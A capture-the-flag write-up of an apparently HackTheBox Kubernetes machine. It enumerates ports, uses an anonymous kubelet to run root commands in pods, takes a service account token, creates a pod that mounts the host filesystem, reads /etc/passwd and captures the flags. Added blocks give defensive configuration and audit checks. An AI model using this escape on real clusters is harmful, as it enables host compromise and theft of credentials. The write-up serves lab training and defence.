
Enumeration

Starting off with an nmap scan:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 17:55 EAT
Stats: 0:03:19 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 17:58 (0:00:00 remaining)
Nmap scan report for 10.10.11.133
Host is up (0.23s latency).
Not shown: 978 closed tcp ports (conn-refused)
PORT     STATE    SERVICE          VERSION
21/tcp   filtered ftp
22/tcp   open     ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA)
|   256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA)
|_  256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519)
25/tcp   filtered smtp
110/tcp  filtered pop3
113/tcp  filtered ident
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
256/tcp  filtered fw1-secureremote
443/tcp  filtered https
445/tcp  filtered microsoft-ds
554/tcp  filtered rtsp
587/tcp  filtered submission
995/tcp  filtered pop3s
1025/tcp filtered NFS-or-IIS
1720/tcp filtered h323q931
1723/tcp filtered pptp
2042/tcp filtered isis
2869/tcp filtered icslap
3001/tcp filtered nessus
3306/tcp filtered mysql
3389/tcp filtered ms-wbt-server
8443/tcp open     ssl/https-alt
| tls-alpn: 
|   h2
|_  http/1.1
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 5d6eacd0-54ad-4080-8f1f-395d6aef4b44
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8
|     X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec
|     Date: Wed, 16 Feb 2022 15:00:41 GMT
|     Content-Length: 212
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403}
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 3bb3108d-9c18-4648-b946-d2b9627e7d7f
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8
|     X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec
|     Date: Wed, 16 Feb 2022 15:00:39 GMT
|     Content-Length: 185
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
|   HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 95c89c5c-b2ef-4197-8741-5d5eab22fb65
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: 42e4e9fa-d40b-4903-a4d2-e1bb7a5d53b8
|     X-Kubernetes-Pf-Prioritylevel-Uid: 990c5c05-a579-40b2-b471-4057191fafec
|     Date: Wed, 16 Feb 2022 15:00:40 GMT
|     Content-Length: 189
|_    {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
| Not valid before: 2022-02-15T14:59:41
|_Not valid after:  2025-02-15T14:59:41
|_http-title: Site doesn't have a title (application/json).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 210.14 seconds

We have two open ports, 22 and 8443, and the nmap report also gives us some very interesting information in the certificate's Subject Alternative Name:

| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1

Opening port 8443 in the browser gave me this response:

Changing from http://ip:8443/ to https://ip:8443/ gave a different response:

So I decided to go ahead with this using Python, though we could just as easily use curl.

req.py

#!/usr/bin/python3
# author : @tahaafarooq#9056
import requests
# import json

# Target: the service on 8443 found by the nmap scan
host = "https://10.10.11.133:8443/"
headers = {'Content-Type': 'application/json'}

# verify=False because the server presents a self-signed minikube certificate;
# this is what produces the InsecureRequestWarning in the output below
req = requests.get(host, headers=headers, verify=False)
res = req.text
print(res)

response

[tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py 
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:anonymous\" cannot get path \"/\"","reason":"Forbidden","details":{},"code":403}

To get an even clearer view of the JSON, I piped it through jq:

[tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py | jq
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {},
  "status": "Failure",
  "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
  "reason": "Forbidden",
  "details": {},
  "code": 403
}

We can see that it's an error message saying the user system:anonymous is forbidden from accessing the path /, which means we first have to authenticate.

Running nmap again, this time over the full port range with the -p- flag rather than the quick default scan, showed several more ports:

PORT      STATE SERVICE
22/tcp    open  ssh
2379/tcp  open  etcd-client
2380/tcp  open  etcd-server
8443/tcp  open  https-alt
10250/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds

We have etcd, a Kubernetes component, listening on port 2379 as the client port and on port 2380 as the server port. Port 10250, which I looked up on Google, is the kubelet (the Kubernetes node agent), and port 8443 is actually the Kubernetes API.

Now this makes sense! Opening port 10250 with my simple script gave me a 404 page not found:

[tahaafarooq@urchinsec-lab steamcloud]$ python3 req.py 
Enter host url (https://) : https://10.10.11.133:10250/
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1013: InsecureRequestWarning: Unverified HTTPS request is being made to host '10.10.11.133'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
  warnings.warn(
404 page not found

I proceeded to directory brute-forcing:

[tahaafarooq@urchinsec-lab steamcloud]$ sudo dirsearch -u https://10.10.11.133:10250/ -e*
[sudo] password for tahaafarooq: 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: GET | Threads: 30 | Wordlist size: 9073

Output File: /usr/lib/python3.10/site-packages/dirsearch-0.4.2-py3.10.egg/dirsearch/reports/10.10.11.133-10250/-_22-02-16_18-24-31.txt

Log File: /usr/lib/python3.10/site-packages/dirsearch-0.4.2-py3.10.egg/dirsearch/logs/22-02-16_18-24-31.log

Target: https://10.10.11.133:10250/

[18:24:32] Starting: 
[18:24:34] 301 -   46B  - /%2e%2e//google.com  ->  /google.com
[18:24:34] 301 -   46B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[18:25:29] 301 -   46B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  ->  /etc/passwd
[18:25:30] 301 -   87B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[18:25:39] 301 -   48B  - /debug/pprof  ->  /debug/pprof/
[18:25:39] 200 -   69KB - /debug/pprof/goroutine?debug=1
[18:25:43] 301 -   74B  - /engine/classes/swfupload//swfupload.swf  ->  /engine/classes/swfupload/swfupload.swf
[18:25:44] 301 -   77B  - /engine/classes/swfupload//swfupload_f9.swf  ->  /engine/classes/swfupload/swfupload_f9.swf
[18:25:45] 301 -   62B  - /extjs/resources//charts.swf  ->  /extjs/resources/charts.swf
[18:25:52] 301 -   72B  - /html/js/misc/swfupload//swfupload.swf  ->  /html/js/misc/swfupload/swfupload.swf
[18:26:02] 301 -   41B  - /logs  ->  /logs/
[18:26:03] 200 -    2KB - /logs/
[18:26:11] 200 -  179KB - /metrics

I found the interesting /logs folder and opened it in the browser; it contains a lot of directories and log files, which are very interesting.

Among them was /logs/pods/, which means I can basically list all the pods.

And there we have it: all the pods from the Kubernetes cluster.

Initial Access & Foothold

The API running on port 8443 is undocumented, meaning we don't know which requests it takes, how the data is arranged, or which parameters are set to which values. Fortunately we can still use kubectl to interface with it and get inside the pod.

With the command kubeletctl --server ip pods we can see the available pods. Now for the foothold part: I scan for RCE with kubeletctl --server ip scan rce, which tells me whether I can run commands on the available pods.

We can see that we can actually run commands on the nginx pod and the kube-proxy-j487c pod:

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root)
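The scan and exec above succeed because the kubelet accepts anonymous requests and authorizes everything it receives. As an added example (not from the original writeup), here is a check of a KubeletConfiguration for those settings; both configs are constructed (the kubelet reads JSON as well as YAML) and the CA file path is a placeholder.

```python
import json

# Constructed KubeletConfiguration that behaves like the kubelet on 10250 above:
# anyone can authenticate as system:anonymous and every request is authorized.
WEAK_KUBELET_CONFIG = """{
  "apiVersion": "kubelet.config.k8s.io/v1beta1",
  "kind": "KubeletConfiguration",
  "authentication": {"anonymous": {"enabled": true}},
  "authorization": {"mode": "AlwaysAllow"}
}"""

# Constructed hardened counterpart: anonymous auth off, client certificates or
# bearer tokens required, and each request checked with the API server (Webhook).
HARDENED_KUBELET_CONFIG = """{
  "apiVersion": "kubelet.config.k8s.io/v1beta1",
  "kind": "KubeletConfiguration",
  "authentication": {
    "anonymous": {"enabled": false},
    "webhook": {"enabled": true},
    "x509": {"clientCAFile": "/PLACEHOLDER/path/to/ca.crt"}
  },
  "authorization": {"mode": "Webhook"}
}"""


def kubelet_findings(config_text):
    """Return the settings in a KubeletConfiguration that expose /pods and /exec."""
    cfg = json.loads(config_text)
    findings = []
    auth = cfg.get("authentication", {})
    anonymous = auth.get("anonymous", {}).get("enabled")
    if anonymous is True:
        findings.append("authentication.anonymous.enabled is true: unauthenticated clients become system:anonymous")
    elif anonymous is None:
        findings.append("authentication.anonymous.enabled unset: verify the kubelet's --anonymous-auth flag")
    mode = cfg.get("authorization", {}).get("mode")
    if mode == "AlwaysAllow":
        findings.append("authorization.mode is AlwaysAllow: any authenticated identity may exec into pods")
    elif mode is None:
        findings.append("authorization.mode unset: verify the kubelet's --authorization-mode flag")
    has_webhook = auth.get("webhook", {}).get("enabled") is True
    has_x509 = bool(auth.get("x509", {}).get("clientCAFile"))
    if not (has_webhook or has_x509):
        findings.append("no webhook or x509 client authentication configured")
    return findings
```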

Privilege Escalation

Now that we have RCE, although only inside a pod, my next approach is to get hold of the token needed for authentication and the certificates, which will allow me to create a service account with higher privileges.

Alright, we have the certificate and the token, so we can just log in with kubectl:

[tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          68m

I now list the privileges I have on the default service account:


Okay, it seems that I can create a pod in the default namespace, as well as get and list pods as I did before.

My approach now is to create a pod using the nginx image. I wrote this basic configuration file (sus.yaml):

apiVersion: v1
kind: Pod
metadata:
  name: sample
  namespace: default
spec:
  containers:
  - name: sample
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /root
      name: rooty
  volumes:
  - name: rooty
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true

That I shall use to create the pod:

[tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f sus.yaml
pod/sample created
[tahaafarooq@urchinsec-lab steamcloud]$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME     READY   STATUS    RESTARTS   AGE
nginx    1/1     Running   0          81m
sample   1/1     Running   0          18s

And we can see that it's already up and running:

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "id" -p sample -c sample
uid=0(root) gid=0(root) groups=0(root)
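From the defender's side, the sample manifest above (a hostPath mount of /, hostNetwork, an automounted service account token) is exactly what an admission check or an audit-log detection should catch. The following is an added example, not part of the original writeup: pod_findings audits a pod spec, and alerts_from_audit runs it over API server audit events; the pod dict and the audit line are constructed, and the service account username is an assumption.

```python
import json
# Constructed: the sample pod above as a dict (no YAML dependency); the API server
# records the same object as requestObject in a RequestResponse-level audit event.
SAMPLE_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "sample", "namespace": "default"},
    "spec": {
        "containers": [{"name": "sample", "image": "nginx:1.14.2",
                        "volumeMounts": [{"mountPath": "/root", "name": "rooty"}]}],
        "volumes": [{"name": "rooty", "hostPath": {"path": "/"}}],
        "automountServiceAccountToken": True,
        "hostNetwork": True,
    },
}

def pod_findings(pod):
    """List the settings in a Pod spec that give its containers a path onto the node."""
    spec = pod.get("spec", {})
    findings = []
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            findings.append(f"volume {vol.get('name')!r} mounts host path {vol['hostPath'].get('path')!r}")
    for flag in ("hostNetwork", "hostPID", "hostIPC"):  # host namespaces
        if spec.get(flag):
            findings.append(f"{flag} is true")
    if spec.get("automountServiceAccountToken", True):  # the field defaults to true
        findings.append("service account token is mounted into the pod")
    return findings

# Constructed audit event, one JSON line as the API server's audit log emits it
AUDIT_LOG = [json.dumps({
    "kind": "Event", "stage": "ResponseComplete", "verb": "create",
    "user": {"username": "system:serviceaccount:default:default"},
    "objectRef": {"resource": "pods", "namespace": "default", "name": "sample"},
    "requestObject": SAMPLE_POD,
})]

def alerts_from_audit(lines):
    """Return (user, namespace/name, findings) for each pod written with risky settings."""
    alerts = []
    for line in lines:
        event = json.loads(line)
        ref = event.get("objectRef", {})
        if (event.get("stage") != "ResponseComplete" or ref.get("resource") != "pods"
                or event.get("verb") not in ("create", "update", "patch")):
            continue
        findings = pod_findings(event.get("requestObject", {}))
        if findings:
            alerts.append((event["user"]["username"], f"{ref['namespace']}/{ref['name']}", findings))
    return alerts
```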

I try getting the root flag:

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/root.txt" -p sample -c sample
cat: /root/root.txt: No such file or directory
command terminated with exit code 1

So I take a look at /etc/passwd:

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /etc/passwd" -p sample -c sample
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
nginx:x:101:101:nginx user,,,:/nonexistent:/bin/false

I couldn't see a user with a /home/ directory, so I'm assuming both users are under /root/ (where the host filesystem is mounted in the pod).

USER FLAG

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/home/user/user.txt" -p sample -c sample
c65246eb8f02a2366f02877d567c1265

ROOT FLAG

[tahaafarooq@urchinsec-lab steamcloud]$ kubeletctl --server 10.10.11.133 exec "cat /root/root/root.txt" -p sample -c sample
3370f968dc760bd1ca95dd701be8b520

Contact: tahaafarooq